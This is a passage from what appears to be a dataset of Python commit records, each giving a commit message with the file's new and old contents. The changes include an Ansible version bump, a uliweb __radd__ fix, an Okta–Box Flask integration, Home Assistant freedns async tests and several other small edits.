        _FACADE = session.EngineFacade.from_config(cfg.CONF, sqlite_fk=True,
                                                   autocommit=True)
    return _FACADE
def get_engine():
    """Return the shared SQLAlchemy engine from the lazily-built facade."""
    facade = _create_facade_lazily()
    return facade.get_engine()
def get_session(**kwargs):
    """Return a new session; kwargs are forwarded to the facade."""
    facade = _create_facade_lazily()
    return facade.get_session(**kwargs)
| # -*- coding: utf-8 -*-
# Copyright 2014 Objectif Libre
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
from oslo_config import cfg
from oslo_db.sqlalchemy import session
_FACADE = None
def _create_facade_lazily():
global _FACADE
if _FACADE is None:
_FACADE = session.EngineFacade.from_config(cfg.CONF, sqlite_fk=True)
return _FACADE
def get_engine():
facade = _create_facade_lazily()
return facade.get_engine()
def get_session(**kwargs):
facade = _create_facade_lazily()
return facade.get_session(**kwargs)
| Python | 0.000019 |
cfe7de10ef9c6c1d8d5be71993e5f96ace58953d | Update Ansible release version to 2.6.0dev0. | lib/ansible/release.py | lib/ansible/release.py | # (c) 2012-2014, Michael DeHaan <michael.dehaan@gmail.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
__version__ = '2.6.0dev0'
__author__ = 'Ansible, Inc.'
__codename__ = 'Heartbreaker'
| # (c) 2012-2014, Michael DeHaan <michael.dehaan@gmail.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
__version__ = '2.6.0a1'
__author__ = 'Ansible, Inc.'
__codename__ = 'Heartbreaker'
| Python | 0 |
359f337d7cfd0dac2eec8ecce643af10588e3e6a | Fix i18n __radd__ bug | uliweb/i18n/lazystr.py | uliweb/i18n/lazystr.py | def lazy(func):
def f(message):
return LazyString(func, message)
return f
class LazyString(object):
"""
>>> from uliweb.i18n import gettext_lazy as _
>>> x = _('Hello')
>>> print repr(x)
"""
def __init__(self, func, message):
self._func = func
self.msg = message
self._format = []
def __unicode__(self):
if not self.msg:
return ''
value = self.getvalue()
if isinstance(value, unicode):
return value
else:
return unicode(self.getvalue(), 'utf-8')
def __str__(self):
if not self.msg:
return ''
value = self.getvalue()
if isinstance(value, unicode):
return value.encode('utf-8')
else:
return str(value)
def format(self, *args, **kwargs):
self._format.append((args, kwargs))
return self
def getvalue(self):
v = self._func(self.msg)
for args, kwargs in self._format:
v = v.format(*args, **kwargs)
return v
def __repr__(self):
return "%s_lazy(%r)" % (self._func.__name__, self.msg)
def __add__(self, obj):
return self.getvalue() + obj
def __radd__(self, obj):
return obj + self.getvalue()
def encode(self, encoding):
return self.getvalue().encode(encoding)
def split(self, *args, **kwargs):
return self.getvalue().split(*args, **kwargs)
# def __getattr__(self, name):
# return getattr(self.getvalue(), name)
| def lazy(func):
def f(message):
return LazyString(func, message)
return f
class LazyString(object):
"""
>>> from uliweb.i18n import gettext_lazy as _
>>> x = _('Hello')
>>> print repr(x)
"""
def __init__(self, func, message):
self._func = func
self.msg = message
self._format = []
def __unicode__(self):
if not self.msg:
return ''
value = self.getvalue()
if isinstance(value, unicode):
return value
else:
return unicode(self.getvalue(), 'utf-8')
def __str__(self):
if not self.msg:
return ''
value = self.getvalue()
if isinstance(value, unicode):
return value.encode('utf-8')
else:
return str(value)
def format(self, *args, **kwargs):
self._format.append((args, kwargs))
return self
def getvalue(self):
v = self._func(self.msg)
for args, kwargs in self._format:
v = v.format(*args, **kwargs)
return v
def __repr__(self):
return "%s_lazy(%r)" % (self._func.__name__, self.msg)
def __add__(self, obj):
return self.getvalue() + obj
def __radd__(self, obj):
return self.getvalue() + obj
def encode(self, encoding):
return self.getvalue().encode(encoding)
def split(self, *args, **kwargs):
return self.getvalue().split(*args, **kwargs)
# def __getattr__(self, name):
# return getattr(self.getvalue(), name)
| Python | 0.263457 |
ac985005f925c0d37ae337ada0bf88b50becaee6 | change scheduler | coalics/schedule.py | coalics/schedule.py | import os.path
import sys
sys.path.append(os.path.join(os.path.dirname(__file__), ".."))
import logging
from coalics import tasks, q, redis, app
from datetime import datetime
from datetime import datetime, timedelta
import time
# stream_handler = logging.StreamHandler()
# stream_handler.setLevel(logging.INFO)
# app.logger.addHandler(stream_handler)
logger = logging.getLogger("Scheduler")
fh = logging.FileHandler("/app/log/scheduler.log")
fh.setLevel(logging.INFO)
logger.setLevel(logging.INFO)
formatter = logging.Formatter("%(asctime)s %(levelname)s %(message)s")
fh.setFormatter(formatter)
logger.addHandler(fh)
prev_job = None
td = timedelta(seconds=app.config["SOURCE_UPDATE_FREQUENCY"])
logger.info("Scheduler launching")
while True:
try:
logger.info("Begin schedule run")
q.enqueue(tasks.update_sources, timeout=td.seconds*0.9)
logger.info("Scheduler: ran without error")
except Exception as e:
logger.error("Scheduler: caught error {}".format(str(e)))
finally:
logger.info("Scheduler: Sleeping for {}s".format(td.seconds))
time.sleep(td.seconds)
| import os.path
import sys
sys.path.append(os.path.join(os.path.dirname(__file__), ".."))
import logging
from coalics import tasks, q, redis, app
from datetime import datetime
from datetime import datetime, timedelta
import time
# stream_handler = logging.StreamHandler()
# stream_handler.setLevel(logging.INFO)
# app.logger.addHandler(stream_handler)
logger = logging.getLogger("Scheduler")
fh = logging.FileHandler("/app/log/scheduler.log")
fh.setLevel(logging.INFO)
logger.setLevel(logging.INFO)
formatter = logging.Formatter("%(asctime)s %(levelname)s %(message)s")
fh.setFormatter(formatter)
logger.addHandler(fh)
prev_job = None
td = timedelta(seconds=app.config["SOURCE_UPDATE_FREQUENCY"])
logger.info("Scheduler launching")
while True:
try:
logger.info("Begin schedule run")
if prev_job: print(prev_job.result)
if prev_job == None or prev_job.result != None:
prev_job = q.enqueue(tasks.update_sources, timeout=td.seconds*0.9)
logger.info("Scheduler: ran without error")
except Exception as e:
logger.error("Scheduler: caught error {}".format(str(e)))
finally:
logger.info("Scheduler: Sleeping for {}s".format(td.seconds))
time.sleep(td.seconds)
| Python | 0.000001 |
9b354f4dc00e3aef4cfceae71be60b1dc60a1927 | Add test for ticket #1559. | numpy/ma/tests/test_regression.py | numpy/ma/tests/test_regression.py | from numpy.testing import *
import numpy as np
rlevel = 1
class TestRegression(TestCase):
def test_masked_array_create(self,level=rlevel):
"""Ticket #17"""
x = np.ma.masked_array([0,1,2,3,0,4,5,6],mask=[0,0,0,1,1,1,0,0])
assert_array_equal(np.ma.nonzero(x),[[1,2,6,7]])
def test_masked_array(self,level=rlevel):
"""Ticket #61"""
x = np.ma.array(1,mask=[1])
def test_mem_masked_where(self,level=rlevel):
"""Ticket #62"""
from numpy.ma import masked_where, MaskType
a = np.zeros((1,1))
b = np.zeros(a.shape, MaskType)
c = masked_where(b,a)
a-c
def test_masked_array_multiply(self,level=rlevel):
"""Ticket #254"""
a = np.ma.zeros((4,1))
a[2,0] = np.ma.masked
b = np.zeros((4,2))
a*b
b*a
def test_masked_array_repeat(self, level=rlevel):
"""Ticket #271"""
np.ma.array([1],mask=False).repeat(10)
def test_masked_array_repr_unicode(self):
"""Ticket #1256"""
repr(np.ma.array(u"Unicode"))
def test_atleast_2d(self):
"""Ticket #1559"""
a = np.ma.masked_array([0.0, 1.2, 3.5], mask=[False, True, False])
b = np.atleast_2d(a)
assert_(a.mask.ndim == 1)
assert_(b.mask.ndim == 2)
if __name__ == "__main__":
run_module_suite()
| from numpy.testing import *
import numpy as np
rlevel = 1
class TestRegression(TestCase):
def test_masked_array_create(self,level=rlevel):
"""Ticket #17"""
x = np.ma.masked_array([0,1,2,3,0,4,5,6],mask=[0,0,0,1,1,1,0,0])
assert_array_equal(np.ma.nonzero(x),[[1,2,6,7]])
def test_masked_array(self,level=rlevel):
"""Ticket #61"""
x = np.ma.array(1,mask=[1])
def test_mem_masked_where(self,level=rlevel):
"""Ticket #62"""
from numpy.ma import masked_where, MaskType
a = np.zeros((1,1))
b = np.zeros(a.shape, MaskType)
c = masked_where(b,a)
a-c
def test_masked_array_multiply(self,level=rlevel):
"""Ticket #254"""
a = np.ma.zeros((4,1))
a[2,0] = np.ma.masked
b = np.zeros((4,2))
a*b
b*a
def test_masked_array_repeat(self, level=rlevel):
"""Ticket #271"""
np.ma.array([1],mask=False).repeat(10)
def test_masked_array_repr_unicode(self):
"""Ticket #1256"""
repr(np.ma.array(u"Unicode"))
| Python | 0 |
813c478f06c175e36dc8334fd37195e403a42166 | update test_symbol_accuracy | test_symbol_accuracy.py | test_symbol_accuracy.py | from dataset import create_testing_data_for_symbol, get_symbol_list
from keras.models import load_model
import sys
INITIAL_CAPITAL = 10000.0
PERCENT_OF_CAPITAL_PER_TRANSACTION = 10.0
TRANSACTION_FEE = 0
def compare(x, y):
if x[3] < y[3]:
return 1
return -1
def main():
model = load_model(sys.argv[1])
symbols = get_symbol_list()
gains = []
for sym in symbols:
print "----"
X, Y = create_testing_data_for_symbol(sym)
money = INITIAL_CAPITAL
true_pos = 0
false_pos = 0
for i in range(len(X)):
current = X[i]
current_value = current[0][-1]
prediction = model.predict(X[i:i+1])
if prediction[0][0] > current_value * 1.01:
investment = 100.0
money -= investment + TRANSACTION_FEE * 2.0
revenue = Y[i:i+1][0][0] / current_value * investment
gain = revenue - investment
money += revenue
if gain > 0.0:
true_pos += 1
else:
false_pos += 1
print ""
print "symbol:", sym
total_gain = money - INITIAL_CAPITAL
percent_gain = ((money / INITIAL_CAPITAL) - 1.0) * 100.0
print "gain:", total_gain, "(", percent_gain, ")"
accuracy = 0 if false_pos+true_pos == 0 else float(true_pos)/float(false_pos+true_pos)
print "true pos:", true_pos, "false pos:", false_pos, "accuracy:", accuracy
gains.append([sym, true_pos, false_pos, accuracy, total_gain, percent_gain])
gains.sort(compare)
for item in gains:
print item
if __name__ == "__main__":
# import dataset
# X, y = dataset.create_testing_data_for_symbol('CBI')
# print X
main() | from dataset import create_testing_data_for_symbol, get_symbol_list
from keras.models import load_model
import sys
INITIAL_CAPITAL = 10000.0
PERCENT_OF_CAPITAL_PER_TRANSACTION = 10.0
TRANSACTION_FEE = 0
def compare(x, y):
if x[1] < y[1]:
return 1
return -1
def main():
model = load_model(sys.argv[1])
symbols = get_symbol_list()
gains = []
for sym in symbols:
X, Y = create_testing_data_for_symbol(sym)
print "----"
money = INITIAL_CAPITAL
for i in range(len(X)):
current = X[i]
current_value = current[0][-1]
prediction = model.predict(X[i:i+1])
if prediction[0][0] > current_value * 1.02:
investment = 100.0
money -= investment + TRANSACTION_FEE * 2.0
revenue = Y[i:i+1][0][0] / current_value * investment
gain = revenue - investment
money += revenue
print ""
print "symbol:", sym
total_gain = money - INITIAL_CAPITAL
percent_gain = ((money / INITIAL_CAPITAL) - 1.0) * 100.0
print "gain:", total_gain, "(", percent_gain, ")"
gains.append([sym, total_gain, percent_gain])
gains.sort(compare)
for item in gains:
print item
if __name__ == "__main__":
main() | Python | 0.000025 |
cf4fc126b49c425d7f441abc91f4114b5f1303ea | Move publication field above tite//subtitle/description in admin | cms_lab_carousel/admin.py | cms_lab_carousel/admin.py | from django.contrib import admin
from cms_lab_carousel.models import Carousel, Slide
class CarouselAdmin(admin.ModelAdmin):
fieldset_frame = ('Carousel Frame', {
'fields': [
'title',
'header_image',
'footer_image',
],
})
fieldset_visibility = ('Visibility', {
'fields': [
'show_title',
'show_header',
'show_footer',
],
'classes': ['collapse'],
})
fieldset_slides = ('Slide Settings', {
'fields': [
'slider_height',
'slider_duration',
'slide_limit',
],
'classes': ['collapse'],
})
fieldsets = [
fieldset_frame,
fieldset_visibility,
fieldset_slides,
]
search_fields = ['title']
admin.site.register(Carousel, CarouselAdmin)
class CarouselFilter(admin.SimpleListFilter):
title = 'Carousel'
parameter_name = 'carousel'
def lookups(self, request, model_admin):
carousel_list = set([slide.carousel for slide in model_admin.model.objects.all()])
return [(carousel.id, carousel.title) for carousel in carousel_list]
def queryset(self, request, queryset):
if self.value():
return queryset.filter(carousel__id__exact=self.value())
else:
return queryset
class SlideAdmin(admin.ModelAdmin):
fieldset_basic = ('Basic Slide Info', {
'fields': [
'carousel',
'publication',
'title',
'subtitle',
'description',
'image',
'image_is_downloadable',
],
})
fieldset_article = ('Scientific Article Info', {
'fields': [
'pdf',
'pubmed_url',
'article_url',
'journal_name',
],
})
fieldset_page_link = ('Page Link', {
'fields': [
'page_link',
'page_link_label',
'page_link_color',
'page_link_anchor',
'page_link_target',
],
'classes': ['collapse'],
})
fieldset_other_url = ('Other URL', {
'fields': [
'other_url',
'other_url_label',
'other_url_color',
],
'classes': ['collapse'],
})
fieldset_publish = ('Publish Settings', {
'fields': [
'publish_slide',
'publish_datetime',
],
})
fieldsets = [
fieldset_basic,
fieldset_article,
fieldset_page_link,
fieldset_other_url,
fieldset_publish,
]
list_display = ['title', 'carousel', 'publish_slide', 'publish_datetime' ]
list_filter = [CarouselFilter, 'publish_slide', 'journal_name']
search_fields = ['title', 'subtitle', 'description']
admin.site.register(Slide, SlideAdmin)
admin.site.site_header = 'CMS Lab Carousel Administration'
| from django.contrib import admin
from cms_lab_carousel.models import Carousel, Slide
class CarouselAdmin(admin.ModelAdmin):
fieldset_frame = ('Carousel Frame', {
'fields': [
'title',
'header_image',
'footer_image',
],
})
fieldset_visibility = ('Visibility', {
'fields': [
'show_title',
'show_header',
'show_footer',
],
'classes': ['collapse'],
})
fieldset_slides = ('Slide Settings', {
'fields': [
'slider_height',
'slider_duration',
'slide_limit',
],
'classes': ['collapse'],
})
fieldsets = [
fieldset_frame,
fieldset_visibility,
fieldset_slides,
]
search_fields = ['title']
admin.site.register(Carousel, CarouselAdmin)
class CarouselFilter(admin.SimpleListFilter):
title = 'Carousel'
parameter_name = 'carousel'
def lookups(self, request, model_admin):
carousel_list = set([slide.carousel for slide in model_admin.model.objects.all()])
return [(carousel.id, carousel.title) for carousel in carousel_list]
def queryset(self, request, queryset):
if self.value():
return queryset.filter(carousel__id__exact=self.value())
else:
return queryset
class SlideAdmin(admin.ModelAdmin):
fieldset_basic = ('Basic Slide Info', {
'fields': [
'carousel',
'title',
'subtitle',
'description',
'image',
'image_is_downloadable',
],
})
fieldset_article = ('Scientific Article Info', {
'fields': [
'publication',
'pdf',
'pubmed_url',
'article_url',
'journal_name',
],
})
fieldset_page_link = ('Page Link', {
'fields': [
'page_link',
'page_link_label',
'page_link_color',
'page_link_anchor',
'page_link_target',
],
'classes': ['collapse'],
})
fieldset_other_url = ('Other URL', {
'fields': [
'other_url',
'other_url_label',
'other_url_color',
],
'classes': ['collapse'],
})
fieldset_publish = ('Publish Settings', {
'fields': [
'publish_slide',
'publish_datetime',
],
})
fieldsets = [
fieldset_basic,
fieldset_article,
fieldset_page_link,
fieldset_other_url,
fieldset_publish,
]
list_display = ['title', 'carousel', 'publish_slide', 'publish_datetime' ]
list_filter = [CarouselFilter, 'publish_slide', 'journal_name']
search_fields = ['title', 'subtitle', 'description']
admin.site.register(Slide, SlideAdmin)
admin.site.site_header = 'CMS Lab Carousel Administration'
| Python | 0 |
f61a4766ad3006bb2001df33d06feeb15352aa5a | Change Box user list request from raw API call to Box SDK make_request method | okta-integration/python/server.py | okta-integration/python/server.py | from flask import Flask, redirect, g, url_for
from flask_oidc import OpenIDConnect
from okta import UsersClient
from boxsdk import Client
from boxsdk import JWTAuth
import requests
import config
import json
app = Flask(__name__)
app.config.update({
'SECRET_KEY': config.okta_client_secret,
'OIDC_CLIENT_SECRETS': './client_secrets.json',
'OIDC_DEBUG': True,
'OIDC_ID_TOKEN_COOKIE_SECURE': False,
'OIDC_SCOPES': ["openid", "profile"],
'OIDC_CALLBACK_ROUTE': config.okta_callback_route
})
oidc = OpenIDConnect(app)
okta_client = UsersClient(config.okta_org_url, config.okta_auth_token)
# Fetch Okta user record if logged in
@app.before_request
def before_request():
if oidc.user_loggedin:
g.user = okta_client.get_user(oidc.user_getfield('sub'))
else:
g.user = None
# Main application route
@app.route('/')
def start():
return redirect(url_for(".box_auth"))
# Box user verification
@app.route("/box_auth")
@oidc.require_login
def box_auth():
uid = g.user.id
# Instantiate Box Client instance
auth = JWTAuth.from_settings_file('../config.json')
box_client = Client(auth)
# Validate is user exists
url = f'https://api.box.com/2.0/users?external_app_user_id={uid}'
response = box_client.make_request('GET', url)
user_info = response.json()
# If user not found, create user, otherwise fetch user token
if (user_info['total_count'] == 0):
user_name = f'{g.user.profile.firstName} {g.user.profile.lastName}'
space = 1073741824
# Create app user
user = box_client.create_user(user_name, None, space_amount=space, external_app_user_id=uid)
print('user {name} created')
else:
# Create user client based on discovered user
user = user_info['entries'][0]
user_to_impersonate = box_client.user(user_id=user['id'])
user_client = box_client.as_user(user_to_impersonate)
# Get current user
current_user = box_client.user().get()
print(current_user.id)
# Get all items in a folder
items = user_client.folder(folder_id='0').get_items()
for item in items:
print('{0} {1} is named "{2}"'.format(item.type.capitalize(), item.id, item.name))
return 'Test complete'
# User logout
@app.route("/logout")
def logout():
oidc.logout() | from flask import Flask, redirect, g, url_for
from flask_oidc import OpenIDConnect
from okta import UsersClient
from boxsdk import Client
from boxsdk import JWTAuth
import requests
import config
import json
app = Flask(__name__)
app.config.update({
'SECRET_KEY': config.okta_client_secret,
'OIDC_CLIENT_SECRETS': './client_secrets.json',
'OIDC_DEBUG': True,
'OIDC_ID_TOKEN_COOKIE_SECURE': False,
'OIDC_SCOPES': ["openid", "profile"],
'OIDC_CALLBACK_ROUTE': config.okta_callback_route
})
oidc = OpenIDConnect(app)
okta_client = UsersClient(config.okta_org_url, config.okta_auth_token)
# Fetch Okta user record if logged in
@app.before_request
def before_request():
if oidc.user_loggedin:
g.user = okta_client.get_user(oidc.user_getfield('sub'))
else:
g.user = None
# Main application route
@app.route('/')
def start():
return redirect(url_for(".box_auth"))
# Box user verification
@app.route("/box_auth")
@oidc.require_login
def box_auth():
uid = g.user.id
auth = JWTAuth.from_settings_file('../config.json')
access_token = auth.authenticate_instance()
box_client = Client(auth)
# Validate is user exists
url = f'https://api.box.com/2.0/users?external_app_user_id={uid}'
headers = {'Authorization': 'Bearer ' + access_token}
response = requests.get(url, headers=headers)
user_info = response.json()
# If user not found, create user, otherwise fetch user token
if (user_info['total_count'] == 0):
user_name = f'{g.user.profile.firstName} {g.user.profile.lastName}'
space = 1073741824
# Create app user
user = box_client.create_user(user_name, None, space_amount=space, external_app_user_id=uid)
print('user {name} created')
else:
# Create user client based on discovered user
user = user_info['entries'][0]
user_to_impersonate = box_client.user(user_id=user['id'])
user_client = box_client.as_user(user_to_impersonate)
# Get current user
current_user = box_client.user().get()
print(current_user.id)
# Get all items in a folder
items = user_client.folder(folder_id='0').get_items()
for item in items:
print('{0} {1} is named "{2}"'.format(item.type.capitalize(), item.id, item.name))
return 'Test complete'
# User logout
@app.route("/logout")
def logout():
oidc.logout()
| Python | 0 |
332cbbd8b1be773593037d293c5dabbf6c100199 | Migrate freedns tests from coroutine to async/await (#30390) | tests/components/freedns/test_init.py | tests/components/freedns/test_init.py | """Test the FreeDNS component."""
import pytest
from homeassistant.components import freedns
from homeassistant.setup import async_setup_component
from homeassistant.util.dt import utcnow
from tests.common import async_fire_time_changed
ACCESS_TOKEN = "test_token"
UPDATE_INTERVAL = freedns.DEFAULT_INTERVAL
UPDATE_URL = freedns.UPDATE_URL
@pytest.fixture
def setup_freedns(hass, aioclient_mock):
"""Fixture that sets up FreeDNS."""
params = {}
params[ACCESS_TOKEN] = ""
aioclient_mock.get(
UPDATE_URL, params=params, text="Successfully updated 1 domains."
)
hass.loop.run_until_complete(
async_setup_component(
hass,
freedns.DOMAIN,
{
freedns.DOMAIN: {
"access_token": ACCESS_TOKEN,
"scan_interval": UPDATE_INTERVAL,
}
},
)
)
async def test_setup(hass, aioclient_mock):
"""Test setup works if update passes."""
params = {}
params[ACCESS_TOKEN] = ""
aioclient_mock.get(
UPDATE_URL, params=params, text="ERROR: Address has not changed."
)
result = await async_setup_component(
hass,
freedns.DOMAIN,
{
freedns.DOMAIN: {
"access_token": ACCESS_TOKEN,
"scan_interval": UPDATE_INTERVAL,
}
},
)
assert result
assert aioclient_mock.call_count == 1
async_fire_time_changed(hass, utcnow() + UPDATE_INTERVAL)
await hass.async_block_till_done()
assert aioclient_mock.call_count == 2
async def test_setup_fails_if_wrong_token(hass, aioclient_mock):
"""Test setup fails if first update fails through wrong token."""
params = {}
params[ACCESS_TOKEN] = ""
aioclient_mock.get(UPDATE_URL, params=params, text="ERROR: Invalid update URL (2)")
result = await async_setup_component(
hass,
freedns.DOMAIN,
{
freedns.DOMAIN: {
"access_token": ACCESS_TOKEN,
"scan_interval": UPDATE_INTERVAL,
}
},
)
assert not result
assert aioclient_mock.call_count == 1
| """Test the FreeDNS component."""
import asyncio
import pytest
from homeassistant.components import freedns
from homeassistant.setup import async_setup_component
from homeassistant.util.dt import utcnow
from tests.common import async_fire_time_changed
ACCESS_TOKEN = "test_token"
UPDATE_INTERVAL = freedns.DEFAULT_INTERVAL
UPDATE_URL = freedns.UPDATE_URL
@pytest.fixture
def setup_freedns(hass, aioclient_mock):
"""Fixture that sets up FreeDNS."""
params = {}
params[ACCESS_TOKEN] = ""
aioclient_mock.get(
UPDATE_URL, params=params, text="Successfully updated 1 domains."
)
hass.loop.run_until_complete(
async_setup_component(
hass,
freedns.DOMAIN,
{
freedns.DOMAIN: {
"access_token": ACCESS_TOKEN,
"scan_interval": UPDATE_INTERVAL,
}
},
)
)
@asyncio.coroutine
def test_setup(hass, aioclient_mock):
"""Test setup works if update passes."""
params = {}
params[ACCESS_TOKEN] = ""
aioclient_mock.get(
UPDATE_URL, params=params, text="ERROR: Address has not changed."
)
result = yield from async_setup_component(
hass,
freedns.DOMAIN,
{
freedns.DOMAIN: {
"access_token": ACCESS_TOKEN,
"scan_interval": UPDATE_INTERVAL,
}
},
)
assert result
assert aioclient_mock.call_count == 1
async_fire_time_changed(hass, utcnow() + UPDATE_INTERVAL)
yield from hass.async_block_till_done()
assert aioclient_mock.call_count == 2
@asyncio.coroutine
def test_setup_fails_if_wrong_token(hass, aioclient_mock):
"""Test setup fails if first update fails through wrong token."""
params = {}
params[ACCESS_TOKEN] = ""
aioclient_mock.get(UPDATE_URL, params=params, text="ERROR: Invalid update URL (2)")
result = yield from async_setup_component(
hass,
freedns.DOMAIN,
{
freedns.DOMAIN: {
"access_token": ACCESS_TOKEN,
"scan_interval": UPDATE_INTERVAL,
}
},
)
assert not result
assert aioclient_mock.call_count == 1
| Python | 0 |
72941398fd2e78cbf5d994b4bf8683c4bdefaab9 | Comment out semipar notebook in travis runner until pip build us updated. | utils/travis_runner.py | utils/travis_runner.py | #!/usr/bin/env python
"""This script manages all tasks for the TRAVIS build server."""
import os
import subprocess
if __name__ == "__main__":
os.chdir("promotion/grmpy_tutorial_notebook")
cmd = [
"jupyter",
"nbconvert",
"--execute",
"grmpy_tutorial_notebook.ipynb",
"--ExecutePreprocessor.timeout=-1",
]
subprocess.check_call(cmd)
os.chdir("../..")
# if __name__ == "__main__":
# os.chdir("promotion/grmpy_tutorial_notebook")
# cmd = [
# "jupyter",
# "nbconvert",
# "--execute",
# "tutorial_semipar_notebook.ipynb",
# "--ExecutePreprocessor.timeout=-1",
# ]
# subprocess.check_call(cmd)
| #!/usr/bin/env python
"""This script manages all tasks for the TRAVIS build server."""
import os
import subprocess
if __name__ == "__main__":
os.chdir("promotion/grmpy_tutorial_notebook")
cmd = [
"jupyter",
"nbconvert",
"--execute",
"grmpy_tutorial_notebook.ipynb",
"--ExecutePreprocessor.timeout=-1",
]
subprocess.check_call(cmd)
os.chdir("../..")
if __name__ == "__main__":
os.chdir("promotion/grmpy_tutorial_notebook")
cmd = [
"jupyter",
"nbconvert",
"--execute",
"tutorial_semipar_notebook.ipynb",
"--ExecutePreprocessor.timeout=-1",
]
subprocess.check_call(cmd)
| Python | 0 |
1f2c175d00729902a953513436879b08a0e3baa3 | test must have broken with upgrade (change in random seed?) so this fixes it | tests/mep/genetics/test_chromosome.py | tests/mep/genetics/test_chromosome.py | import unittest
import random
from mep.genetics.gene import VariableGene, OperatorGene, Gene
from mep.genetics.chromosome import Chromosome
import numpy as np
class MockedGene(Gene):
def __init__(self, error_to_return):
"""
Initialize.
:param error_to_return: what to return in the evaluate
:type error_to_return: float
"""
self.error_to_return = error_to_return
def evaluate(self, gene_index, eval_matrix, data_matrix, constants, targets):
"""
Simple mocked version.
"""
return self.error_to_return
class TestChromosome(unittest.TestCase):
"""
Tests for the chromosome.
"""
def test_basic_random_construction(self):
"""
Basic example of a construction.
"""
# set the seed to keep it reproducible
random.seed(0)
# create the chromosome
num_genes = 2
num_constants = 1
chromosome = Chromosome.generate_random_chromosome(num_constants=num_constants, constants_min=1,
constants_max=10, constants_prob=0.2,
feature_variable_prob=0.3,
num_feature_variables=2, num_genes=num_genes,
operators_prob=0.5)
# confirm the number of genes and constants match what we expect
self.assertEqual(num_genes, len(chromosome.genes))
self.assertEqual(num_constants, len(chromosome.constants))
# the first gene has to be a variable gene; in particular it is this one
self.assertEqual(VariableGene(0, is_feature=False), chromosome.genes[0])
# the 2nd gene can be a variable or an operator; in this case it is the below
self.assertEqual(OperatorGene(Chromosome.operators_family[4](), 0, 0), chromosome.genes[1])
# verify constant
self.assertAlmostEqual(8.599796663725433, chromosome.constants[0])
def test_evaluate(self):
"""
Basic test of the evaluate method.
"""
# construct mocked genes
genes = [MockedGene(10), MockedGene(1)]
# construct chromosome
chromosome = Chromosome(genes, constants=[1, 2, 3])
# evaluate
chromosome.evaluate(np.zeros((2, 2)), targets=[20, 30])
# confirm the genes
self.assertEqual(genes[1], genes[chromosome.best_gene_index])
self.assertEqual(genes[1].error_to_return, chromosome.error)
def test_sort(self):
"""
Test the sort mechanism.
"""
# construct the chromosomes and test sorting them (by error)
min_chromosome, mid_chromosome, max_chromosome = Chromosome([], []), Chromosome([], []), Chromosome([], [])
min_chromosome.error = 1
mid_chromosome.error = 2
max_chromosome.error = 3
chromosomes = [mid_chromosome, max_chromosome, min_chromosome]
expected_chromosomes = [min_chromosome, mid_chromosome, max_chromosome]
# do the sort and verify
chromosomes.sort()
self.assertEqual(expected_chromosomes, chromosomes)
| import unittest
import random
from mep.genetics.gene import VariableGene, OperatorGene, Gene
from mep.genetics.chromosome import Chromosome
import numpy as np
class MockedGene(Gene):
def __init__(self, error_to_return):
"""
Initialize.
:param error_to_return: what to return in the evaluate
:type error_to_return: float
"""
self.error_to_return = error_to_return
def evaluate(self, gene_index, eval_matrix, data_matrix, constants, targets):
"""
Simple mocked version.
"""
return self.error_to_return
class TestChromosome(unittest.TestCase):
"""
Tests for the chromosome.
"""
def test_basic_random_construction(self):
"""
Basic example of a construction.
"""
# set the seed to keep it reproducible
random.seed(0)
# create the chromosome
num_genes = 2
num_constants = 1
chromosome = Chromosome.generate_random_chromosome(num_constants=num_constants, constants_min=1,
constants_max=10, constants_prob=0.2,
feature_variable_prob=0.3,
num_feature_variables=2, num_genes=num_genes,
operators_prob=0.5)
# confirm the number of genes and constants match what we expect
self.assertEquals(num_genes, len(chromosome.genes))
self.assertEquals(num_constants, len(chromosome.constants))
# the first gene has to be a variable gene; in particular it is this one
self.assertEquals(VariableGene(0, is_feature=False), chromosome.genes[0])
# the 2nd gene can be a variable or an operator; in this case it is the below
self.assertEquals(OperatorGene(Chromosome.operators_family[2](), 0, 0), chromosome.genes[1])
# verify constant
self.assertAlmostEquals(8.599796663725433, chromosome.constants[0])
def test_evaluate(self):
"""
Basic test of the evaluate method.
"""
# construct mocked genes
genes = [MockedGene(10), MockedGene(1)]
# construct chromosome
chromosome = Chromosome(genes, constants=[1, 2, 3])
# evaluate
chromosome.evaluate(np.zeros((2, 2)), targets=[20, 30])
# confirm the genes
self.assertEqual(genes[1], genes[chromosome.best_gene_index])
self.assertEqual(genes[1].error_to_return, chromosome.error)
def test_sort(self):
"""
Test the sort mechanism.
"""
# construct the chromosomes and test sorting them (by error)
min_chromosome, mid_chromosome, max_chromosome = Chromosome([], []), Chromosome([], []), Chromosome([], [])
min_chromosome.error = 1
mid_chromosome.error = 2
max_chromosome.error = 3
chromosomes = [mid_chromosome, max_chromosome, min_chromosome]
expected_chromosomes = [min_chromosome, mid_chromosome, max_chromosome]
# do the sort and verify
chromosomes.sort()
self.assertEqual(expected_chromosomes, chromosomes)
| Python | 0 |
17dfc3faa45584200c8f67686b86b541a2ce01fe | Test for informal word | revscoring/languages/tests/test_hebrew.py | revscoring/languages/tests/test_hebrew.py | from nose.tools import eq_
from .. import language, hebrew
def test_language():
is_misspelled = hebrew.solve(language.is_misspelled)
assert is_misspelled("חטול")
assert not is_misspelled("חתול")
